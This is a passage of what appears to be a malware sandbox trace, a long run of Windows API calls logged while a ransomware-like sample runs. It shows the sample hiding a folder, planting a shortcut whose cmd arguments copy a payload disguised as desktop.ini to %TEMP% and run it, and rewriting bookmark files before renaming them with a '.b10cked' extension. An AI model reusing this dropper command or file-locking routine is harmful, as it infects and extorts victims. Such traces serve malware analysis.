\"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa74, dwThreadId=0x794)) returned 1 [0213.572] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0214.584] CloseHandle (hObject=0x120) returned 1 [0214.584] CloseHandle (hObject=0x1b4) returned 1 [0214.584] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0214.584] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0214.584] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0214.584] GetTickCount () returned 0x3c17a [0214.584] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=27137337170) returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x5a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x62\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x31\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x48\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0214.584] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0214.584] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0214.584] CharUpperBuffW (in: lpsz="explorer.exe \"MSN Websites\" & type \"MSN Websites\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x69 | out: lpsz="EXPLORER.EXE \"MSN WEBSITES\" & TYPE \"MSN WEBSITES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x69 [0214.584] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0214.585] CharUpperBuffW (in: lpsz="explorer.exe \"MSN Websites\" & type \"MSN Websites\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6a | out: lpsz="EXPLORER.EXE \"MSN WEBSITES\" & TYPE \"MSN WEBSITES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6a [0214.585] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0214.585] CoInitialize (pvReserved=0x0) returned 0x0 [0214.585] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0214.586] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0214.586] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0214.586] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0214.588] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"MSN Websites\" & type \"MSN Websites\\desktop.ini\" > \"%TEMP%\\q8ZbmX1H.exe\" && \"%TEMP%\\q8ZbmX1H.exe\"") returned 0x0 [0214.588] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0214.588] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0214.588] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0214.588] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Favorites\\MSN Websites.lnk", fRemember=0) returned 0x0 [0214.594] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0214.594] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0214.594] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0214.594] CoUninitialize () [0214.595] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.595] ReleaseMutex (hMutex=0xf8) returned 1 [0214.595] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.595] ReleaseMutex (hMutex=0xf8) returned 1 [0214.595] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.595] ReleaseMutex (hMutex=0xf8) returned 1 [0214.595] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.595] ReleaseMutex (hMutex=0xf8) returned 1 [0214.595] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27138527059) returned 1 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.598] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.599] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.599] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.599] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.599] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.599] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.599] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Entertainment.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0214.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Entertainment.url", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Entertainment.url", lpUsedDefaultChar=0x0) returned 21 [0214.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.604] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.605] CloseHandle (hObject=0x120) returned 1 [0214.609] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL") returned 0x2f [0214.609] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.610] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x914, dwThreadId=0xe40)) returned 1 [0214.611] CloseHandle (hObject=0x1b4) returned 1 [0214.611] CloseHandle (hObject=0x120) returned 1 [0214.611] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.611] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.611] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.611] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.611] ReleaseMutex (hMutex=0xf8) returned 1 [0214.611] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.611] ReleaseMutex (hMutex=0xf8) returned 1 [0214.611] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.612] ReleaseMutex (hMutex=0xf8) returned 1 [0214.612] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.612] ReleaseMutex (hMutex=0xf8) returned 1 [0214.612] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27140118925) returned 1 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 